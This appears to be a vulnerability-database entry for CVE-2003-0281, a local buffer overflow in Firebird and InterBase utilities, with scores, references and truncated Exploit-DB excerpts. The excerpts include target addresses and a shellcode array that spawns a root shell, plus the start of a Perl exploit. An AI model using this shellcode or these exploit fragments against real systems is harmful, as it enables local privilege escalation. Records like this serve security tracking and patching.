CVE-2003-0281
Published 2003-06-16
Priority: P4 · 14 · medium · 4.6 (CVSS 2.0)
CVSS 2.0 vector: AV:L/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.01% (58.8th percentile)
Buffer overflow in Firebird 1.0.2 and other versions before 1.5, and possibly other products that use the InterBase codebase, allows local users to execute arbitrary code via a long INTERBASE environment variable when calling (1) gds_inet_server, (2) gds_lock_mgr, or (3) gds_drop.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| firebirdsql | firebird | — | — |
No detection rules found.
Exploit-DB
Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Local Privilege Escalation
exploitdb·2003-05-12
---
/* DSR-firebird.c
Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE
This is Proof Of concept code.
bash-2.05a$ ./DSR-firebird
( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )
( ( by - [email protected] ) )
Usage: ./DSR-firebird
Targets:
1. [0xbfbff75d] - gds_inet_server
2. [0xbfbff75c] - gds_lock_mgr
3. [0xbfbff75e] - gds_drop
bash-2.05a$
*/
#include
#include
#include
#define LOCK "/usr/local/firebird/bin/gds_lock_mgr"
#define DROP "/usr/local/firebird/bin/gds_drop"
#define INET "/usr/local/firebird/bin/gds_inet_server"
#define LEN 1056
char dropcode[]=
"\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
"\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
Exploit-DB
Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (2)
exploitdb·2002-06-18
---
// source: https://www.securityfocus.com/bid/5044/info
Interbase is a database distributed and maintained by Borland. It is available for Unix and Linux operating systems.
A buffer overflow has been discovered in the gds_drop program packaged with Interbase. This problem could allow a local user to execute the program with strings of arbitrary length. By using a custom crafted string, the attacker could overwrite stack memory, including the return address of a function, and potentially execute arbitrary code.
Firebird is based on Borland/Inprise Interbase source code and is therefore also prone to this issue.
/* DSR-firebird.c by [email protected]
Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE
bash-2.05a$ ./
Exploit-DB
Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (1)
exploitdb·2002-06-15
---
source: https://www.securityfocus.com/bid/5044/info
Interbase is a database distributed and maintained by Borland. It is available for Unix and Linux operating systems.
A buffer overflow has been discovered in the gds_drop program packaged with Interbase. This problem could allow a local user to execute the program with strings of arbitrary length. By using a custom crafted string, the attacker could overwrite stack memory, including the return address of a function, and potentially execute arbitrary code.
Firebird is based on Borland/Inprise Interbase source code and is therefore also prone to this issue.
#!/usr/bin/perl -w
#
# gds_drop exploit for Interbase 6.0 linux beta
#
# - tested on redhat 7.2
#
No writeups or analysis indexed.
References:
http://marc.info/?l=bugtraq&m=105259012802997&w=2
http://seclists.org/lists/bugtraq/2002/Jun/0212.html
http://secunia.com/advisories/8758
http://security.gentoo.org/glsa/glsa-200405-18.xml
http://www.securityfocus.com/bid/7546
https://exchange.xforce.ibmcloud.com/vulnerabilities/11977